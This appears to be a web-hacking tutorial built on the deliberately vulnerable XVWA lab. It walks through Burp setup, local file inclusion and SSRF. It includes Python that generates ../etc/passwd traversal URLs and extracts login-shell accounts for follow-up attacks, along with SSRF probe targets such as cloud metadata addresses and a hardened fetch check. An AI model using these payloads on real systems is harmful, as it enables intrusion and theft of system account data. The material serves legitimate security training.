
This post is about learning web app hacking with the Xtreme Vulnerable Web App (XVWA). The app ships as a bootable OS image, so once the virtual machine is up you can log in at its console and find its IP address immediately with ip a. That seems easy enough, but locating the target's address is exactly the initial machine discovery step of a CTF-style scenario; on a real engagement you would not have console access and would find the host with a network scan from the attacking machine instead.

Here’s What You Need

  • Xtreme Vulnerable Web App found at vulnhub.
  • Kali Linux Virtual Machine (VirtualBox)

Create a new virtual machine in VirtualBox (yes, VirtualBox: VMware is less accessible overall and is therefore the ethicalhackingguru's second choice) and then configure the image. Go to the Storage tab, select the optical drive listed under the Controller section, and choose the .iso file downloaded in the previous step so the VM boots from it. Put the XVWA VM and the Kali VM on the same network (a host-only adapter works well) so that Kali can reach the web app once it is running.

Setup Burp as a proxy

Set the proxy settings in Firefox to use Burp as an HTTP proxy. By default Burp listens on 127.0.0.1:8080, so that is the host and port to enter unless you changed the listener.

Once Firefox is pointed at Burp, refresh the page and move over to Burp; with intercept on, the request will be waiting in the Proxy tab.

To verify that a listener is actually running, go to the Proxy tab and then the Options sub-tab, and check that the listener interface (127.0.0.1:8080 by default) is listed there and marked as running. If the page never loads in Firefox, a missing or stopped listener is the first thing to rule out.

Local File Inclusion

What happens when just anyone can make the application read files that should otherwise stay hidden? Local file inclusion (LFI) vulnerabilities leave sensitive information, such as the list of all users on the local system in /etc/passwd, wide open for public exploration. In this example I show how local file inclusion is possible in XVWA using the most common technique: passing a path such as ../etc/passwd in the parameter that names the file to include. The number of ../ segments you need depends on how deep the including script's directory sits below the filesystem root, so if the first attempt returns nothing, keep adding more.

All the users for your consumption.
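The probing loop described above, written out as an added example that is not part of the original post or of XVWA: it builds the traversal payloads at increasing depth, turns them into request URLs, and recognises a successful hit by parsing /etc/passwd records out of the HTML that comes back. The base URL and the parameter name "file" are assumptions (XVWA's real parameter may be named differently), and the two sample responses are constructed.

```python
# Added example (not XVWA's code): building LFI probe requests and
# recognising /etc/passwd in the response. The base URL and the parameter
# name "file" are assumptions; XVWA's real parameter may differ.
import re
from urllib.parse import urlencode

# One /etc/passwd record: name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^([a-z_][a-z0-9_-]*):[^:]*:(\d+):(\d+):[^:]*:([^:]*):([^:\s]*)$"
)
NO_LOGIN_SHELLS = {"", "/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def traversal_payloads(target="etc/passwd", max_depth=8):
    """Yield ../ chains of increasing depth.

    The depth that works depends on how far below / the including script
    lives, which you cannot see from outside, so try them in turn.
    """
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target


def probe_urls(base_url, param="file", **kwargs):
    """Full request URLs for each payload. urlencode turns / into %2F; the
    web server decodes that back before PHP sees the parameter."""
    return [f"{base_url}?{urlencode({param: p})}"
            for p in traversal_payloads(**kwargs)]


def parse_passwd(body):
    """Return (user, uid, shell) for every line in body that is a passwd record."""
    entries = []
    for line in body.splitlines():
        m = PASSWD_LINE.match(line.strip())
        if m:
            entries.append((m.group(1), int(m.group(2)), m.group(5)))
    return entries


def looks_like_passwd(body):
    """Success check: a root record with uid 0 plus at least two other records."""
    entries = parse_passwd(body)
    return len(entries) >= 3 and any(u == "root" and uid == 0 for u, uid, _ in entries)


def interactive_accounts(body):
    """Accounts with a real login shell: the ones to try next against SSH or su."""
    return [u for u, _, shell in parse_passwd(body) if shell not in NO_LOGIN_SHELLS]


# Constructed sample of what a successful include looks like when the
# page wraps the file contents in HTML.
SAMPLE_HIT = """<html><body><pre>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
</pre></body></html>"""

# Constructed sample of a miss: PHP's include warning instead of the file.
SAMPLE_MISS = "<b>Warning</b>: include(../etc/passwd): failed to open stream"

if __name__ == "__main__":
    for url in probe_urls("http://10.0.0.5/app/page.php", max_depth=3):
        print(url)
    print(looks_like_passwd(SAMPLE_HIT), interactive_accounts(SAMPLE_HIT))
```

Send each URL through Burp (set an HTTP proxy of 127.0.0.1:8080 in whatever client you use) and stop at the first response for which looks_like_passwd is true; interactive_accounts then gives the usernames worth carrying into the next stage.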

Server Side Request Forgery

SSRF, or server-side request forgery, is a useful technique for bypassing firewalls. Basically it means getting a vulnerable web app to make a request on your behalf. The path of least resistance is often the route taken in cracking the perimeter: finding a vulnerable web application and tricking the server hosting it into making requests, to hosts on its own internal network and even outbound to the internet, is much easier than getting through the firewall directly. Because the request originates from the server, it carries the server's network position and is allowed wherever the server is allowed.

As you can see in this example, I point the vulnerable parameter at a house.jpg image file hosted on my Kali machine, and the XVWA server fetches it and renders it (poorly) on the app's page.

It did not render well, but it worked: the server made an outbound request to a host of my choosing, which is all an attacker needs to start mapping whatever the server itself can reach.
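To make the failure mode concrete, here is an added example (not XVWA's code and not from the original post) that puts the naive fetch an SSRF-prone feature performs beside a target check that rejects loopback, private, link-local and other non-public destinations after resolving the host. All function names are assumptions; the resolver is injectable so the check can be exercised offline, and the addresses in the usage are stand-ins.

```python
# Added example (not XVWA's code): the naive fetch an SSRF-prone feature
# performs, beside a target check that rejects loopback, private,
# link-local and other non-public destinations after resolving the host.
# Function names are assumptions; the resolver is injectable so the check
# can be exercised without network access.
import ipaddress
import socket
from urllib.parse import urlsplit
from urllib.request import urlopen

ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_fetch(url):
    """What the app effectively does: fetch whatever URL it is given.
    file:///etc/passwd, http://127.0.0.1/admin, http://10.0.0.5/ all go through."""
    with urlopen(url) as resp:
        return resp.read()


def resolve_all(host):
    """Every address a hostname resolves to (v4 and v6); IP literals pass through."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_forbidden_ip(ip):
    """True for any address the server should never be asked to contact."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_target(url, resolve=resolve_all):
    """Return (ok, detail): ok is True only if the scheme is http(s) and
    every address the host resolves to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolve(host)
    except OSError as exc:
        return False, f"cannot resolve {host}: {exc}"
    for ip in addrs:
        if is_forbidden_ip(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, ",".join(addrs)


def guarded_fetch(url, resolve=resolve_all):
    """The hardened counterpart of vulnerable_fetch."""
    ok, detail = check_fetch_target(url, resolve)
    if not ok:
        raise ValueError(f"refusing to fetch {url}: {detail}")
    return vulnerable_fetch(url)


if __name__ == "__main__":
    # 10.0.0.5 stands in for the attacker's Kali box on the lab network.
    for candidate in ("http://10.0.0.5/house.jpg",
                      "http://127.0.0.1/admin",
                      "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd"):
        print(candidate, check_fetch_target(candidate, resolve=lambda h: [h]))
```

Two caveats a reviewer would raise on the hardened version: the check resolves the name once and then urlopen resolves it again, so a DNS record that flips between a public and an internal address (rebinding) can still slip through unless the fetch is pinned to the address that was checked, and urlopen follows redirects, so the final URL must be checked too, not just the first. Note also that the lab image fetched in this post, served from a private address, is precisely what the check would refuse.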